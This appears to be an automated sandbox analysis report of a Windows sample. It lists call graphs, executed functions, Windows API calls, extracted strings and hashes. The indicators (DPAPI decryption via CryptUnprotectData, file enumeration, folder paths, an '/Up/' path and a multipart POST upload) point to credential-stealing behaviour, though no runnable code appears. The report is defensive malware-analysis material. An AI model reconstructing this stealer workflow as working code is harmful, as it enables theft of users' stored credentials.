41 API calls 38711->38757 38712->38690 38712->38710 38714 356560 97 API calls 38713->38714 38715 371ecd 38714->38715 38716 371f22 _Yarn __Getctype 38715->38716 38719 354db0 68 API calls 38715->38719 38722 354400 69 API calls 38716->38722 38742 371f70 error_info_injector 38716->38742 38717 36f050 41 API calls 38717->38757 38718 35e940 41 API calls 38718->38739 38726 371ee0 38719->38726 38720 35e940 41 API calls 38720->38757 38721 356f10 96 API calls 38721->38742 38723 371f5e 38722->38723 38725 353aa0 69 API calls 38723->38725 38724 35e940 41 API calls 38724->38742 38727 371f6a 38725->38727 38726->38716 38859 37b078 39 API calls 2 library calls 38726->38859 38730 37b1b7 ___std_exception_copy 14 API calls 38727->38730 38729 360fc0 41 API calls 38729->38739 38730->38742 38731 371f11 38860 37a0d0 66 API calls ___std_exception_copy 38731->38860 38732 35f110 41 API calls 38732->38757 38734 355340 46 API calls 38734->38739 38735 37239e 38862 35f4f0 41 API calls 38735->38862 38736 36f050 41 API calls 38736->38742 38738 355ce0 6 API calls 38738->38739 38739->38688 38739->38690 38739->38695 38739->38703 38739->38706 38739->38709 38739->38718 38739->38729 38739->38734 38739->38738 38740 3558c0 20 API calls 38739->38740 38741 371dc3 GetProcessHeap HeapFree 38740->38741 38741->38739 38742->38688 38742->38690 38742->38721 38742->38724 38742->38736 38743 372105 Sleep 38742->38743 38744 372184 38742->38744 38743->38742 38745 37b1b7 ___std_exception_copy 14 API calls 38744->38745 38745->38697 38746 356f10 96 API calls 38746->38757 38747 356f10 96 API calls 38748 3710e6 SHGetFolderPathA 38747->38748 38748->38757 38753 360fc0 41 API calls 38753->38757 38754 356f10 96 API calls 38755 371492 SHGetFolderPathA 38754->38755 38755->38757 38756 35ff80 41 API calls 38756->38757 38757->38688 38757->38690 38757->38693 38757->38711 38757->38717 38757->38720 38757->38732 38757->38735 38757->38746 38757->38747 38757->38753 38757->38754 38757->38756 38760 3701c0 38757->38760 38856 372dd0 41 API calls 2 library calls 38757->38856 38857 372940 39 API calls error_info_injector 38757->38857 38858 35e730 5 API calls CatchGuardHandler 38757->38858 38758->38682 38761 35f7b0 41 API calls 38760->38761 38762 370221 FindFirstFileA 38761->38762 38807 370251 error_info_injector 38762->38807 38764 370901 38765 374a11 CatchGuardHandler 5 API calls 38764->38765 38767 37092a 38765->38767 38766 370930 38768 380fd8 39 API calls 38766->38768 38767->38757 38769 370935 38768->38769 38771 356f10 96 API calls 38769->38771 38770 35ecd0 41 API calls 38772 3702f1 PathMatchSpecA 38770->38772 38773 370a47 38771->38773 38772->38807 38774 35e940 41 API calls 38773->38774 38849 370a4e _Yarn error_info_injector 38774->38849 38775 356f10 96 API calls 38775->38807 38776 3723a3 38875 37b1dd 39 API calls __CreateFrameInfo 38776->38875 38777 35e940 41 API calls 38777->38807 38778 35f7b0 41 API calls 38778->38807 38780 3723a8 38782 380fd8 39 API calls 38780->38782 38781 35f110 41 API calls 38781->38807 38783 3723ad 38782->38783 38784 371a3f 38787 355dd0 70 API calls 38784->38787 38790 37218a error_info_injector 38784->38790 38836 371a77 _Yarn error_info_injector 38787->38836 38788 371e25 38789 36d5a0 96 API calls 38788->38789 38791 371e30 __CreateFrameInfo 38789->38791 38790->38780 38798 372380 error_info_injector 38790->38798 38873 372940 39 API calls error_info_injector 38790->38873 38799 356f10 96 API calls 38791->38799 38792 35ecd0 41 API calls 38792->38807 38794 374a11 CatchGuardHandler 5 API calls 38796 37239a 38794->38796 38795 37233c 38795->38780 38795->38798 38796->38757 38797 3701c0 134 API calls 38797->38807 38798->38794 38801 371e6c 38799->38801 38800 373c10 96 API calls 38800->38836 38802 3564a0 101 API calls 38801->38802 38808 371e7d error_info_injector 38802->38808 38803 356f10 96 API calls 38803->38836 38805 35eb40 41 API calls 38809 371ec1 38805->38809 38806 3664d0 41 API calls 38806->38849 38807->38764 38807->38766 38807->38770 38807->38775 38807->38777 38807->38778 38807->38781 38807->38792 38807->38797 38864 3731e0 41 API calls 38807->38864 38865 3729b0 5 API calls CatchGuardHandler 38807->38865 38866 372dd0 41 API calls 2 library calls 38807->38866 38867 372940 39 API calls error_info_injector 38807->38867 38808->38780 38808->38805 38811 356560 97 API calls 38809->38811 38810 35ee10 41 API calls 38810->38836 38813 371ecd 38811->38813 38816 354db0 68 API calls 38813->38816 38821 371f22 _Yarn __Getctype 38813->38821 38814 35e940 41 API calls 38814->38836 38815 36f050 41 API calls 38815->38849 38823 371ee0 38816->38823 38817 354400 69 API calls 38819 371f5e 38817->38819 38818 35f110 41 API calls 38818->38849 38822 353aa0 69 API calls 38819->38822 38820 35e940 41 API calls 38839 371f70 error_info_injector 38820->38839 38821->38817 38821->38839 38824 371f6a 38822->38824 38823->38821 38871 37b078 39 API calls 2 library calls 38823->38871 38827 37b1b7 ___std_exception_copy 14 API calls 38824->38827 38826 360fc0 41 API calls 38826->38836 38827->38839 38828 371f11 38872 37a0d0 66 API calls ___std_exception_copy 38828->38872 38829 356f10 96 API calls 38829->38839 38831 355340 46 API calls 38831->38836 38832 37239e 38874 35f4f0 41 API calls 38832->38874 38833 36f050 41 API calls 38833->38839 38835 355ce0 6 API calls 38835->38836 38836->38776 38836->38780 38836->38788 38836->38800 38836->38803 38836->38810 38836->38814 38836->38826 38836->38831 38836->38835 38837 3558c0 20 API calls 38836->38837 38838 371dc3 GetProcessHeap HeapFree 38837->38838 38838->38836 38839->38776 38839->38780 38839->38820 38839->38829 38839->38833 38840 372105 Sleep 38839->38840 38841 372184 38839->38841 38840->38839 38842 37b1b7 ___std_exception_copy 14 API calls 38841->38842 38842->38790 38843 356f10 96 API calls 38844 3710e6 SHGetFolderPathA 38843->38844 38844->38849 38845 3701c0 134 API calls 38845->38849 38849->38776 38849->38780 38849->38784 38849->38806 38849->38815 38849->38818 38849->38832 38849->38843 38849->38845 38850 356f10 96 API calls 38849->38850 38851 35e940 41 API calls 38849->38851 38852 356f10 96 API calls 38849->38852 38854 35ff80 41 API calls 38849->38854 38855 360fc0 41 API calls 38849->38855 38868 372dd0 41 API calls 2 library calls 38849->38868 38869 372940 39 API calls error_info_injector 38849->38869 38870 35e730 5 API calls CatchGuardHandler 38849->38870 38850->38849 38851->38849 38853 371492 SHGetFolderPathA 38852->38853 38853->38849 38854->38849 38855->38849 38856->38757 38857->38757 38858->38757 38859->38731 38860->38716 38861->38702 38864->38807 38865->38807 38866->38807 38867->38807 38868->38849 38869->38849 38870->38849 38871->38828 38872->38821 38873->38795

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 00359630 Relevance: 40.4, APIs: 20, Strings: 1, Instructions: 3643memoryfilesleepCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0035CE40: NtQueryAttributesFile.NTDLL ref: 0035CDDD
                                                                                                                                                                                              • Part of subcall function 00373C10: NtCreateFile.NTDLL ref: 00373D3F
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0035A127
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0035A12E
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035A5B4
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,00000001), ref: 0035A5BB
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035AA41
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,00000001), ref: 0035AA48
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035AECE
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,00000001), ref: 0035AED5
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0035B13D
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0035B295
                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000002), ref: 0035B29C
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035BD80
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,00000001), ref: 0035BD87
                                                                                                                                                                                              • Part of subcall function 00356F10: Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035C2B6
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,00000001), ref: 0035C2BD
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035C71A
                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,00000001), ref: 0035C721
                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 0035B144
                                                                                                                                                                                              • Part of subcall function 00373C10: GetProcessHeap.KERNEL32(?,?,?), ref: 00373D5F
                                                                                                                                                                                              • Part of subcall function 00373C10: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00373D69
                                                                                                                                                                                              • Part of subcall function 00373C10: NtReadFile.NTDLL ref: 00373D9B
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 0035CB7E
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,00000001), ref: 0035CB85
                                                                                                                                                                                            • FindFirstFileA.KERNELBASE ref: 0035D0B2
                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0035D519
                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,00000000,?,?), ref: 0035D724
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$Free$File$Find$AllocateAttributesConcurrency::cancel_current_taskCreateFirstNextQueryReadSleep
                                                                                                                                                                                            • String ID: NCo
                                                                                                                                                                                            • API String ID: 2388217530-2199656919
                                                                                                                                                                                            • Opcode ID: 39b5a8b56fdc6cc73721cd2eb8889f97a03317c527c541cb6c0adea28f3b1d4b
                                                                                                                                                                                            • Instruction ID: 5397dd1d02cbd0a9d90660b23c5c4565fb3d4122330477f9fe8c228945ebe266
                                                                                                                                                                                            • Opcode Fuzzy Hash: 39b5a8b56fdc6cc73721cd2eb8889f97a03317c527c541cb6c0adea28f3b1d4b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B63C471A102148FEB1EDF24CC95FADB772BF45305F1082D8E8096B6A2DB749AC98F51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00356F10 Relevance: 36.0, APIs: 12, Strings: 7, Instructions: 2754COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID: MyApp/1.0$NCo$\Ext\$\key$en_k$inc$os_c
                                                                                                                                                                                            • API String ID: 118556049-2782671678
                                                                                                                                                                                            • Opcode ID: c41097598d98846a03815615bf176bae513b03423ccf49468bbc2743a67f6f66
                                                                                                                                                                                            • Instruction ID: 56b72ebae3c7d1e4cf2abd8dbced5e63e63d47f5259aef7bb8bdc76b0c2c14ad
                                                                                                                                                                                            • Opcode Fuzzy Hash: c41097598d98846a03815615bf176bae513b03423ccf49468bbc2743a67f6f66
                                                                                                                                                                                            • Instruction Fuzzy Hash: D5330671A102148FDB1EDF24CC95FAEB771BF45301F108698E8096B6A2DB749AC9CF51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00356560 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 280COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,00000000), ref: 00356588
                                                                                                                                                                                              • Part of subcall function 00356F10: Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
                                                                                                                                                                                              • Part of subcall function 00356F10: lstrlenA.KERNEL32(00000000), ref: 00357272
                                                                                                                                                                                              • Part of subcall function 00356F10: GetProcessHeap.KERNEL32 ref: 003572B6
                                                                                                                                                                                              • Part of subcall function 00356F10: HeapAlloc.KERNEL32(00000000,00000008,?), ref: 003572C0
                                                                                                                                                                                              • Part of subcall function 00356F10: CryptUnprotectData.CRYPT32 ref: 00357349
                                                                                                                                                                                              • Part of subcall function 00356F10: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00357352
                                                                                                                                                                                              • Part of subcall function 00356F10: HeapFree.KERNEL32(00000000), ref: 00357359
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocConcurrency::cancel_current_taskCryptDataFreePathTempUnprotectlstrlen
                                                                                                                                                                                            • String ID: --------$($/?#$Content-Type: application/octet-stream; boundary=----$POST$[%:$xz:$xz:$xz:
                                                                                                                                                                                            • API String ID: 4232048245-4086417300
                                                                                                                                                                                            • Opcode ID: 4c528e056a105c1a3934becf352db6a80d86feb09fa1ca8314d012994fd61fb5
                                                                                                                                                                                            • Instruction ID: 440a4385b0c4562c95628ea467cb89f35166902c4f7ac21c121e11a7bee09f6a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c528e056a105c1a3934becf352db6a80d86feb09fa1ca8314d012994fd61fb5
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6A1F670A003009BD70AFF34C856BAE77A4BF56309F50464CF8455F2A2EB75E68A87D2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0036C490 Relevance: 16.9, APIs: 3, Strings: 6, Instructions: 1133sleepCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 2952 36c490-36c502 call 356f10 call 35e940 2957 36d557 call 37b1dd 2952->2957 2958 36c508-36c511 2952->2958 2963 36d55c call 380fd8 2957->2963 2959 36c515-36c54e call 356f10 call 374780 2958->2959 2960 36c513 2958->2960 2970 36c580-36c62a call 356f10 call 35e940 call 35fa30 call 374650 call 356f10 call 35e940 2959->2970 2971 36c550-36c560 2959->2971 2960->2959 2967 36d561 call 37b1dd 2963->2967 2972 36d566-36d593 call 380fd8 2967->2972 2970->2967 2991 36c630-36c639 2970->2991 2973 36c576-36c57d call 374ea2 2971->2973 2974 36c562-36c570 2971->2974 2973->2970 2974->2963 2974->2973 2992 36c63d-36c67b call 356f10 2991->2992 2993 36c63b 2991->2993 2998 36c6ad-36c773 call 356f10 call 35e940 call 35fa30 call 374650 call 356f10 GetNativeSystemInfo 2992->2998 2999 36c67d-36c68d 2992->2999 2993->2992 3014 36c775-36c779 2998->3014 3015 36c77b-36c783 call 36d9a0 2998->3015 3000 36c6a3-36c6aa call 374ea2 2999->3000 3001 36c68f-36c69d 2999->3001 3000->2998 3001->2972 3001->3000 3014->3015 3016 36c788-36c7c9 KiUserCallbackDispatcher call 356070 * 2 3014->3016 3015->3016 3025 36c7e2-36c7f4 call 35ff80 3016->3025 3026 36c7cb-36c7d6 3016->3026 3030 36c7f6-36c846 call 360fc0 3025->3030 3027 36c7da-36c7e0 3026->3027 3028 36c7d8 3026->3028 3027->3030 3028->3027 3034 36c878-36c87f 3030->3034 3035 36c848-36c858 3030->3035 3036 36c881-36c88e 3034->3036 3037 36c8ae-36c8cd 3034->3037 3038 36c86e-36c875 call 374ea2 3035->3038 3039 36c85a-36c868 3035->3039 3040 36c8a4-36c8ab call 374ea2 3036->3040 3041 36c890-36c89e 3036->3041 3042 36c8cf-36c8dc 3037->3042 3043 36c8fc-36c9f3 call 35ef10 call 36bfe0 call 35f110 call 374c1c call 356f10 call 35e940 call 35f110 3037->3043 3038->3034 3039->3038 3040->3037 3041->3040 3046 36c8f2-36c8f9 call 374ea2 3042->3046 3047 36c8de-36c8ec 3042->3047 3066 36ca25-36cb10 call 36b2d0 call 35f110 call 374c1c call 356f10 call 35e940 call 35f110 3043->3066 3067 36c9f5-36ca05 3043->3067 3046->3043 3047->3046 3084 36cb42-36cca7 call 35f110 call 374c1c call 35ee10 call 356f10 call 35e940 call 35f110 * 2 call 374c1c call 35ee10 call 356f10 call 35e940 call 35f110 call 36be50 3066->3084 3085 36cb12-36cb22 3066->3085 3069 36ca07-36ca15 3067->3069 3070 36ca1b-36ca22 call 374ea2 3067->3070 3069->3070 3070->3066 3116 36ccab-36cd4e call 381089 call 35f110 call 356f10 call 35e940 call 35f110 3084->3116 3117 36cca9 3084->3117 3087 36cb24-36cb32 3085->3087 3088 36cb38-36cb3f call 374ea2 3085->3088 3087->3088 3088->3084 3128 36cd80-36cd95 call 36bcd0 3116->3128 3129 36cd50-36cd60 3116->3129 3117->3116 3135 36cd97 3128->3135 3136 36cd99-36ce3c call 381089 call 35f110 call 356f10 call 35e940 call 35f110 3128->3136 3130 36cd76-36cd7d call 374ea2 3129->3130 3131 36cd62-36cd70 3129->3131 3130->3128 3131->3130 3135->3136 3148 36ce6e-36ce93 call 36b4b0 call 35ef10 3136->3148 3149 36ce3e-36ce4e 3136->3149 3158 36ce95-36ce99 3148->3158 3159 36ce9b 3148->3159 3151 36ce64-36ce6b call 374ea2 3149->3151 3152 36ce50-36ce5e 3149->3152 3151->3148 3152->3151 3160 36ce9d-36cedd call 363830 call 360530 call 360490 3158->3160 3159->3160 3167 36cf00-36cf72 call 356f10 call 35e940 call 35f110 3160->3167 3168 36cedf-36cefc 3160->3168 3176 36cfa4-36d0f1 call 381089 call 35f110 call 356f10 call 35e940 call 35f110 call 36d7a0 call 355dd0 call 356f10 call 36f050 3167->3176 3177 36cf74-36cf84 3167->3177 3168->3167 3200 36d0f3-36d100 3176->3200 3201 36d120-36d18c call 355340 call 355ce0 call 3558c0 3176->3201 3179 36cf86-36cf94 3177->3179 3180 36cf9a-36cfa1 call 374ea2 3177->3180 3179->3180 3180->3176 3202 36d116-36d11d call 374ea2 3200->3202 3203 36d102-36d110 3200->3203 3212 36d18e-36d196 3201->3212 3213 36d1db-36d1eb call 35ee10 call 36c3a0 3201->3213 3202->3201 3203->3202 3214 36d198-36d19c 3212->3214 3215 36d1a9-36d1ac 3212->3215 3219 36d1f0-36d244 call 376750 call 356f10 call 3564a0 3213->3219 3217 36d1ae-36d1b2 3214->3217 3218 36d19e-36d1a7 3214->3218 3215->3217 3215->3219 3217->3213 3221 36d1b4-36d1b7 3217->3221 3218->3214 3218->3215 3234 36d246-36d253 3219->3234 3235 36d273-36d295 call 35eb40 call 356560 3219->3235 3221->3219 3225 36d1b9-36d1bf 3221->3225 3225->3213 3227 36d1c1-36d1c4 3225->3227 3227->3219 3229 36d1c6-36d1cc 3227->3229 3229->3213 3231 36d1ce-36d1d1 3229->3231 3231->3219 3233 36d1d3-36d1d9 3231->3233 3233->3213 3233->3219 3236 36d255-36d263 3234->3236 3237 36d269-36d270 call 374ea2 3234->3237 3244 36d330-36d36a call 356f10 call 356ad0 3235->3244 3245 36d29b-36d2b5 call 354db0 3235->3245 3236->3237 3237->3235 3255 36d36f-36d37f 3244->3255 3250 36d2b7-36d2bb 3245->3250 3251 36d2bd-36d2c1 3245->3251 3250->3251 3253 36d2e1-36d31d call 37a107 call 376ca0 call 354400 call 353aa0 call 37b1b7 3250->3253 3251->3253 3254 36d2c3-36d2c8 3251->3254 3284 36d322-36d325 3253->3284 3254->3253 3256 36d2ca-36d2de call 37b078 call 37a0d0 3254->3256 3257 36d3b2-36d3b4 3255->3257 3258 36d381-36d38e 3255->3258 3256->3253 3260 36d3c6-36d3f1 call 37b1b7 3257->3260 3261 36d3b6-36d3c1 Sleep 3257->3261 3263 36d3a4-36d3af call 374ea2 3258->3263 3264 36d390-36d39e 3258->3264 3282 36d423-36d44b 3260->3282 3283 36d3f3-36d403 3260->3283 3261->3244 3263->3257 3264->2963 3264->3263 3287 36d47d-36d487 3282->3287 3288 36d44d-36d45d 3282->3288 3285 36d405-36d413 3283->3285 3286 36d419-36d420 call 374ea2 3283->3286 3284->3244 3285->3286 3286->3282 3289 36d4b9-36d4f4 call 35f110 3287->3289 3290 36d489-36d499 3287->3290 3292 36d473-36d47a call 374ea2 3288->3292 3293 36d45f-36d46d 3288->3293 3303 36d4f6-36d506 3289->3303 3304 36d522-36d52c 3289->3304 3295 36d4af-36d4b6 call 374ea2 3290->3295 3296 36d49b-36d4a9 3290->3296 3292->3287 3293->3292 3295->3289 3296->3295 3307 36d518-36d51f call 374ea2 3303->3307 3308 36d508-36d516 3303->3308 3305 36d543-36d556 call 374a11 3304->3305 3306 36d52e-36d53e call 35f090 3304->3306 3306->3305 3307->3304 3308->3307
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00356F10: Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
                                                                                                                                                                                            • GetNativeSystemInfo.KERNELBASE(?), ref: 0036C761
                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL ref: 0036C792
                                                                                                                                                                                              • Part of subcall function 00356F10: lstrlenA.KERNEL32(00000000), ref: 00357272
                                                                                                                                                                                              • Part of subcall function 00356F10: GetProcessHeap.KERNEL32 ref: 003572B6
                                                                                                                                                                                              • Part of subcall function 00356F10: HeapAlloc.KERNEL32(00000000,00000008,?), ref: 003572C0
                                                                                                                                                                                              • Part of subcall function 00356F10: CryptUnprotectData.CRYPT32 ref: 00357349
                                                                                                                                                                                              • Part of subcall function 00356F10: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00357352
                                                                                                                                                                                              • Part of subcall function 00356F10: HeapFree.KERNEL32(00000000), ref: 00357359
                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,?,00000000,?,?), ref: 0036D3BB
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocCallbackConcurrency::cancel_current_taskCryptDataDispatcherFreeInfoNativeSleepSystemUnprotectUserlstrlen
                                                                                                                                                                                            • String ID: .txt$/Up$1715006195$MyApp/1.0$ref.txt$x86
                                                                                                                                                                                            • API String ID: 2845703258-3094677209
                                                                                                                                                                                            • Opcode ID: 72f8df371f51f09986265fe1445c26167311bfe32a1bd21ba786306e3f2890d6
                                                                                                                                                                                            • Instruction ID: 5ded90c274c6335b42a354fbb17c1c4b2ee55a3d231335c122af90771d3592eb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 72f8df371f51f09986265fe1445c26167311bfe32a1bd21ba786306e3f2890d6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 70A21770A143808BD72ADF34C855BEFB7E1AFD5304F148A1CF4894B6A2DB75A585CB82
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00370940 Relevance: 15.7, APIs: 5, Strings: 3, Instructions: 1652COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: /Up/$MyApp/1.0$unknown
                                                                                                                                                                                            • API String ID: 0-3989902347
                                                                                                                                                                                            • Opcode ID: 3b47771956d4ce77dbae7ca87bce5592793b3a23f281eab134c9360bc1ac2f2d
                                                                                                                                                                                            • Instruction ID: a46fa34dce60cbfcbe4474bada33462811fb24b647fe4430717e4aa5403f0017
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b47771956d4ce77dbae7ca87bce5592793b3a23f281eab134c9360bc1ac2f2d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E2C5715183808FE73ADF28C895BAFB7E1BFC5314F148A1CE48D5B2A1DB7895858B42
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00373C10 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 190memoryfilenativeCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3993 373c10-373c4b call 373990 call 35fbd0 3998 373c7f-373d73 call 374780 * 2 call 374650 * 3 NtCreateFile GetProcessHeap RtlAllocateHeap 3993->3998 3999 373c4d-373c5f 3993->3999 4022 373d75-373d9f NtReadFile 3998->4022 4023 373dab-373dae 3998->4023 4000 373c75-373c7c call 374ea2 3999->4000 4001 373c61-373c6f 3999->4001 4000->3998 4001->4000 4003 373e43 call 380fd8 4001->4003 4010 373e48-373e4f call 380fd8 4003->4010 4022->4023 4030 373da1-373da9 4022->4030 4024 373db4-373dba 4023->4024 4026 373dbc-373dce 4024->4026 4027 373dea-373e04 4024->4027 4031 373de0-373de7 call 374ea2 4026->4031 4032 373dd0-373dde 4026->4032 4028 373e06-373e12 4027->4028 4029 373e2e-373e40 call 374a11 4027->4029 4033 373e24-373e2b call 374ea2 4028->4033 4034 373e14-373e22 4028->4034 4030->4024 4031->4027 4032->4010 4032->4031 4033->4029 4034->4010 4034->4033
